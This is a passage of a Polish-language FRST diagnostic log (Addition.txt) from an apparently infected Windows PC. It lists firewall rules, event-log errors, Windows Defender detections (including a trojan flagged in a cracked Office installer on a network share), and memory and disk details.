FirewallRules: [{1F80BC70-BC06-4E62-B430-38B9B3E2EE30}] = & gt; (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.86.337.0_x86__zpdnekdrzrea0\Spotify.exe
FirewallRules: [{6990B2CB-803E-424D-BEF0-BE9821A80BC1}] = & gt; (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.86.337.0_x86__zpdnekdrzrea0\Spotify.exe
FirewallRules: [{E0878170-76AC-4740-93A6-4BCE9C4BCFE9}] = & gt; (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.86.337.0_x86__zpdnekdrzrea0\Spotify.exe
FirewallRules: [{FA7EA0EA-A09E-4B32-AE2B-DED4F469DDFC}] = & gt; (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.86.337.0_x86__zpdnekdrzrea0\Spotify.exe
FirewallRules: [{E877C47C-7E2A-4557-ADF4-5A0A510D4827}] = & gt; (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.86.337.0_x86__zpdnekdrzrea0\Spotify.exe
FirewallRules: [{D8A50B8A-FA31-42CD-9CF0-1CADFAB76DC7}] = & gt; (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.86.337.0_x86__zpdnekdrzrea0\Spotify.exe
FirewallRules: [{6A2630C9-863D-4314-B8C9-DC3B9EB9A73D}] = & gt; (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.86.337.0_x86__zpdnekdrzrea0\Spotify.exe
FirewallRules: [{5575884F-AA30-4207-9C03-305BBDB38807}] = & gt; (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.86.337.0_x86__zpdnekdrzrea0\Spotify.exe
FirewallRules: [{12907C14-5067-4C91-8EA9-0C5419770FAC}] = & gt; (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{C7AFC8EB-007A-471F-B37F-FEAA371B0653}] = & gt; (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{3B85D569-2840-4A3B-8E5B-1C14FB686B25}] = & gt; (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{782DF502-4AE0-4AFB-9A05-410FE2DE7F99}] = & gt; (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{A4A76218-26EF-4517-B284-0EE505794769}] = & gt; (Allow) C:\Program Files\Opera\56.0.3051.52\opera.exe
FirewallRules: [{6D1D45F1-9380-4F00-A6A8-BC3B7C6FC06B}] = & gt; (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\WebKit2WebProcess.exe
FirewallRules: [{22FB9998-2784-485A-8DAA-BF4C53327757}] = & gt; (Allow) C:\Users\CmK\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{8AB00ED5-7A47-4631-9570-929152013A9E}] = & gt; (Allow) C:\Users\CmK\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{CD9E53F0-459A-48F0-8894-D0722326722F}] = & gt; (Allow) C:\WINDOWS\SysWOW64\msiexec.exe
FirewallRules: [{0CAFACB6-F0D0-441C-BF18-E7BC143938DF}] = & gt; (Allow) C:\Program Files (x86)\ygeGO.exe
FirewallRules: [{F64F6BC0-209C-491E-98B0-B1D9A2DF1A74}] = & gt; (Allow) C:\Users\CmK\AppData\Local\uUCgYOi.exe
FirewallRules: [{C939AA95-0371-4472-8414-3A1CC5E1EEDC}] = & gt; (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{A7ED0B50-9441-44FF-B29C-553178A2BF9A}] = & gt; (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.92.390.0_x86__zpdnekdrzrea0\Spotify.exe
FirewallRules: [{2E54C657-848F-4EEB-9421-57095AAC9791}] = & gt; (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.92.390.0_x86__zpdnekdrzrea0\Spotify.exe
FirewallRules: [{A3B821C2-5641-4F17-9FBE-49F857B99DCE}] = & gt; (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.92.390.0_x86__zpdnekdrzrea0\Spotify.exe
FirewallRules: [{077E3F98-1E2C-466E-8454-F0E8EFC9D12C}] = & gt; (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.92.390.0_x86__zpdnekdrzrea0\Spotify.exe
FirewallRules: [{8B6C13E9-2817-4B4A-AFF8-15E0D544AF28}] = & gt; (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.92.390.0_x86__zpdnekdrzrea0\Spotify.exe
FirewallRules: [{276A166F-2B48-4497-B8A1-4264AB6607F3}] = & gt; (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.92.390.0_x86__zpdnekdrzrea0\Spotify.exe
FirewallRules: [{6F86305E-6C61-44A4-8099-B5FB456E7E19}] = & gt; (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.92.390.0_x86__zpdnekdrzrea0\Spotify.exe
FirewallRules: [{697DFB62-B052-4543-9384-3A6397A57853}] = & gt; (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.92.390.0_x86__zpdnekdrzrea0\Spotify.exe
FirewallRules: [{D71DFEBA-87B3-45B3-A695-77FC95054A55}] = & gt; (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{B022EFC4-431B-4973-996E-5FF94D5DAE71}] = & gt; (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{F5FE72A8-A23C-4E63-B606-7661E0EB5230}] = & gt; (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{EEC2D90B-834E-44F2-855C-77298A747008}] = & gt; (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{5FB269CC-3CBF-4F50-A674-E6DD30120F1C}] = & gt; (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{C8604160-D90A-4D8E-A59D-FE8204DF43E1}] = & gt; (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{75F2037F-2A81-4C9B-8C49-EC0B55F38463}] = & gt; (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{37FFD43A-1D9E-4FF8-A429-5DDBDEF74046}] = & gt; (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{6FF3391D-2F75-404F-83F8-CA593BB8464A}] = & gt; (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{B6686B94-B79B-48E2-83DA-8E02612EA47E}] = & gt; (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{E6924538-C179-4F2F-91CD-5E27DD181B6B}] = & gt; (Allow) C:\Program Files\Opera\56.0.3051.99\opera.exe
FirewallRules: [{19C58BD7-41B6-41DD-AC8D-15FEA2EC0FFE}] = & gt; (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{526C1F1F-42FE-474A-A8D1-5081A29985BA}] = & gt; (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{BF7C8066-D1C7-4D92-984E-FF75F66BAD6B}] = & gt; (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{0D9872A1-8617-42F1-B37A-D53490E47278}] = & gt; (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Punkty Przywracania systemu =========================

05-11-2018 08:16:38 Instalator modułów systemu Windows
06-11-2018 10:09:33 Instalator modułów systemu Windows
13-11-2018 11:57:08 Zaplanowany punkt kontrolny

==================== Wadliwe urządzenia w Menedżerze urządzeń =============

Name:
Description:
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click " Update Driver " , which starts the Hardware Update wizard.


==================== Błędy w Dzienniku zdarzeń: =========================

Dziennik Aplikacja:
==================
Error: (11/15/2018 04:04:16 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0

Error: (11/14/2018 09:24:14 AM) (Source: Microsoft-Windows-SpellChecker) (EventID: 33) (User: KAROL)
Description: httphttp-2147467263

Error: (11/14/2018 07:59:58 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0

Error: (11/13/2018 07:00:29 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0

Error: (11/09/2018 12:51:02 PM) (Source: Microsoft Office 16) (EventID: 2001) (User: )
Description: Microsoft Word: Rejected Safe Mode action : Poprawne uruchomienie programu Word ostatnim razem nie powiodło się. Uruchomienie w trybie awaryjnym pomoże naprawić problem, jednak niektóre funkcje mogą być w tym trybie niedostępne.

Czy chcesz uruchomić w trybie awaryjnym?.
Rejected Safe Mode action : Microsoft Word.

Error: (11/09/2018 08:44:14 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nazwa aplikacji powodującej błąd: WINWORD.EXE, wersja: 16.0.4266.1001, sygnatura czasowa: 0x55ba1919
Nazwa modułu powodującego błąd: mso30win32client.dll, wersja: 16.0.4266.1001, sygnatura czasowa: 0x55ba121f
Kod wyjątku: 0xc0000005
Przesunięcie błędu: 0x000000000012c848
Identyfikator procesu powodującego błąd: 0x23d0
Godzina uruchomienia aplikacji powodującej błąd: 0x01d47800006ea921
Ścieżka aplikacji powodującej błąd: C:\Program Files\Microsoft Office\Office16\WINWORD.EXE
Ścieżka modułu powodującego błąd: C:\Program Files\Common Files\Microsoft Shared\Office16\mso30win32client.dll
Identyfikator raportu: 10b05596-e9e1-415f-bd59-b7d1c41ef031
Pełna nazwa pakietu powodującego błąd:
Identyfikator aplikacji względem pakietu powodującego błąd:

Error: (11/09/2018 08:43:56 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nazwa aplikacji powodującej błąd: WINWORD.EXE, wersja: 16.0.4266.1001, sygnatura czasowa: 0x55ba1919
Nazwa modułu powodującego błąd: mso40uiwin32client.dll, wersja: 16.0.4266.1001, sygnatura czasowa: 0x55ba1b30
Kod wyjątku: 0xc0000005
Przesunięcie błędu: 0x000000000003ee20
Identyfikator procesu powodującego błąd: 0x1f5c
Godzina uruchomienia aplikacji powodującej błąd: 0x01d4773f5292a26b
Ścieżka aplikacji powodującej błąd: C:\Program Files\Microsoft Office\Office16\WINWORD.EXE
Ścieżka modułu powodującego błąd: C:\Program Files\Common Files\Microsoft Shared\Office16\mso40uiwin32client.dll
Identyfikator raportu: 59d9a857-0105-4019-b8e9-6242e2803c0a
Pełna nazwa pakietu powodującego błąd:
Identyfikator aplikacji względem pakietu powodującego błąd:

Error: (11/09/2018 08:01:52 AM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0


Dziennik System:
=============
Error: (11/15/2018 08:20:06 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Nie można uruchomić usługi eapihdrv z powodu następującego błędu:
Nastąpiło zablokowanie ładowania sterownika

Error: (11/15/2018 08:20:06 AM) (Source: Application Popup) (EventID: 1060) (User: )
Description: \??\C:\Users\CmK\AppData\Local\Temp\ehdrv.sys

Error: (11/15/2018 08:20:06 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Nie można uruchomić usługi eapihdrv z powodu następującego błędu:
Nastąpiło zablokowanie ładowania sterownika

Error: (11/15/2018 08:20:06 AM) (Source: Application Popup) (EventID: 1060) (User: )
Description: \??\C:\Users\CmK\AppData\Local\Temp\ehdrv.sys

Error: (11/15/2018 08:20:06 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Nie można uruchomić usługi eapihdrv z powodu następującego błędu:
Nastąpiło zablokowanie ładowania sterownika

Error: (11/15/2018 08:20:06 AM) (Source: Application Popup) (EventID: 1060) (User: )
Description: \??\C:\Users\CmK\AppData\Local\Temp\ehdrv.sys

Error: (11/15/2018 08:20:05 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Nie można uruchomić usługi eapihdrv z powodu następującego błędu:
Nastąpiło zablokowanie ładowania sterownika

Error: (11/15/2018 08:20:05 AM) (Source: Application Popup) (EventID: 1060) (User: )
Description: \??\C:\Users\CmK\AppData\Local\Temp\ehdrv.sys


Windows Defender:
===================================
Date: 2018-11-07 09:11:19.786
Description:
Skanowanie produktu Program antywirusowy Windows Defender zostało zatrzymane przed ukończeniem.
Identyfikator skanowania: {5925A3E8-7293-4F30-8F3E-1213FFFA656F}
Typ skanowania: Narzędzia chroniące przed złośliwym oprogramowaniem
Parametry skanowania: Szybkie skanowanie
Użytkownik: ZARZĄDZANIE NT\SYSTEM

Date: 2018-10-31 09:15:08.695
Description:
Skanowanie produktu Program antywirusowy Windows Defender zostało zatrzymane przed ukończeniem.
Identyfikator skanowania: {88619536-5AF4-4C86-8B09-4A6B6E553F8B}
Typ skanowania: Narzędzia chroniące przed złośliwym oprogramowaniem
Parametry skanowania: Szybkie skanowanie
Użytkownik: ZARZĄDZANIE NT\SYSTEM

Date: 2018-10-24 09:41:51.206
Description:
Skanowanie produktu Program antywirusowy Windows Defender zostało zatrzymane przed ukończeniem.
Identyfikator skanowania: {4EC0E834-D300-4C7E-BA31-CFE9A60386AE}
Typ skanowania: Narzędzia chroniące przed złośliwym oprogramowaniem
Parametry skanowania: Szybkie skanowanie
Użytkownik: ZARZĄDZANIE NT\SYSTEM

Date: 2018-10-22 09:24:00.130
Description:
Produkt Program antywirusowy Windows Defender wykrył złośliwe oprogramowanie lub inne potencjalnie niechciane oprogramowanie.
Aby uzyskać więcej informacji, zobacz:
https://go.microsoft.com/fwlink/?linkid=37020 & name=Trojan:Win32/Vigorf.A & threatid=2147714384 & enterprise=0
Nazwa: Trojan:Win32/Vigorf.A
Identyfikator: 2147714384
Ważność: Poważny
Kategoria: Koń trojański
Ścieżka: file:_\\192.168.1.11\firma\Oprogramowanie\Pakiety Biurowe\Microsoft Office 2019 Preview Build 16.0.9330.2087 (x64)\Microsoft Office 2019 Preview Build 16.0.9330.2087 (x64) [Tech-Tools.ME]\OInstall.exe
Pochodzenie wykrycia: Udział sieciowy
Typ wykrycia: FastPath
Źródło wykrycia: Ochrona w czasie rzeczywistym
Użytkownik: KAROL\CmK
Nazwa procesu: C:\Windows\explorer.exe
Wersja podpisu: AV: 1.279.259.0, AS: 1.279.259.0, NIS: 1.279.259.0
Wersja aparatu: AM: 1.1.15400.4, NIS: 1.1.15400.4

Date: 2018-10-18 12:53:19.572
Description:
Produkt Program antywirusowy Windows Defender wykrył podejrzane zachowanie.
Nazwa: Informational:Behavior/ModifiedKernel
Identyfikator: 4244714811
Ważność: Niski
Kategoria: Podejrzane zachowanie
Znaleziona ścieżka: process:_0
Pochodzenie wykrycia: Nieznane
Typ wykrycia: Podejrzane
Źródło wykrycia: Ochrona w czasie rzeczywistym
Stan: Wykonywanie
Użytkownik: Unknown\Unknown
Nazwa procesu: Unknown
Identyfikator podpisu: 717259538435
Wersja podpisu: AV: 1.279.22.0, AS: 1.279.22.0
Wersja aparatu: 1.1.15400.4
Etykieta wierności: Niskie
Nazwa pliku docelowego:

Date: 2018-11-07 16:03:23.546
Description:
Produkt Program antywirusowy Windows Defender napotkał błąd podczas próby aktualizacji podpisów.
Nowa wersja podpisu:
Poprzednia wersja podpisu: 1.279.1343.0
Źródło aktualizacji: Serwer usługi Microsoft Update
Typ podpisu: Oprogramowanie antywirusowe
Typ aktualizacji: Pełne
Użytkownik: ZARZĄDZANIE NT\SYSTEM
Bieżąca wersja aparatu:
Poprzednia wersja aparatu: 1.1.15400.4
Kod błędu: 0x8007043c
Opis błędu: Tej usługi nie można uruchomić w trybie awaryjnym

Date: 2018-11-07 15:53:18.344
Description:
Agent ochrony w czasie rzeczywistym produktu Program antywirusowy Windows Defender wykrył błąd i jego uruchomienie nie powiodło się.
Funkcja: Przy dostępie
Kod błędu: 0x8007043c
Opis błędu: Tej usługi nie można uruchomić w trybie awaryjnym
Przyczyna: Ochrona przed złośliwym kodem przestała działać z nieznanej przyczyny. W niektórych przypadkach problem można rozwiązać, uruchamiając ponownie usługę.

Date: 2018-11-07 15:41:41.063
Description:
Agent ochrony w czasie rzeczywistym produktu Program antywirusowy Windows Defender wykrył błąd i jego uruchomienie nie powiodło się.
Funkcja: Przy dostępie
Kod błędu: 0x8007043c
Opis błędu: Tej usługi nie można uruchomić w trybie awaryjnym
Przyczyna: Ochrona przed złośliwym kodem przestała działać z nieznanej przyczyny. W niektórych przypadkach problem można rozwiązać, uruchamiając ponownie usługę.

Date: 2018-10-05 12:48:18.465
Description:
Produkt Program antywirusowy Windows Defender napotkał błąd podczas próby aktualizacji podpisów.
Nowa wersja podpisu:
Poprzednia wersja podpisu: 1.277.641.0
Źródło aktualizacji: Serwer usługi Microsoft Update
Typ podpisu: Oprogramowanie antywirusowe
Typ aktualizacji: Pełne
Użytkownik: ZARZĄDZANIE NT\SYSTEM
Bieżąca wersja aparatu:
Poprzednia wersja aparatu: 1.1.15300.6
Kod błędu: 0x80240016
Opis błędu: Podczas sprawdzania aktualizacji wystąpił nieoczekiwany problem. Aby uzyskać informacje na temat instalowania aktualizacji i rozwiązywania problemów z nimi, zobacz Pomoc i obsługę techniczną.

Date: 2018-08-17 08:01:28.981
Description:
Agent ochrony w czasie rzeczywistym produktu Program antywirusowy Windows Defender wykrył błąd i jego uruchomienie nie powiodło się.
Funkcja: Przy dostępie
Kod błędu: 0x80004005
Opis błędu: Nieokreślony błąd.
Przyczyna: Sterownik filtru pominął skanowanie elementów i pracuje w trybie przekazywania. Może to być spowodowane niskim stanem zasobów.

CodeIntegrity:
===================================

Date: 2018-11-08 12:09:20.631
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\VBoxUSB.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

==================== Statystyki pamięci ===========================

Procesor: Intel(R) Core(TM) i3-2330M CPU @ 2.20GHz
Procent pamięci w użyciu: 47%
Całkowita pamięć fizyczna: 8098.05 MB
Dostępna pamięć fizyczna: 4236.12 MB
Całkowita pamięć wirtualna: 9378.05 MB
Dostępna pamięć wirtualna: 4805.93 MB

==================== Dyski ================================

Drive c: () (Fixed) (Total:243.7 GB) (Free:10.39 GB) NTFS
Drive e: () (Fixed) (Total:221.13 GB) (Free:138.41 GB) NTFS
Drive h: (Nowy) (Fixed) (Total:731.95 GB) (Free:614.13 GB) NTFS

\\?\Volume{e84b779a-0000-0000-0000-100000000000}\ (Zastrzeżone przez system) (Fixed) (Total:0.49 GB) (Free:0.16 GB) NTFS
\\?\Volume{e84b779a-0000-0000-0000-200c3d000000}\ () (Fixed) (Total:0.44 GB) (Free:0.05 GB) NTFS
\\?\Volume{2d558650-0000-0000-0000-f0fcb6000000}\ () (Fixed) (Total:0.47 GB) (Free:0.08 GB) NTFS

==================== MBR & Tablica partycji ==================

========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 465.8 GB) (Disk ID: E84B779A)
Partition 1: (Active) - (Size=500 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=243.7 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=450 MB) - (Type=27)
Partition 4: (Not Active) - (Size=221.1 GB) - (Type=07 NTFS)

========================================================
Disk: 2 (MBR Code: Windows 7/8/10) (Size: 931.5 GB) (Disk ID: 2D558650)
Partition 1: (Not Active) - (Size=732 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=480 MB) - (Type=27)

==================== Koniec Addition.txt ============================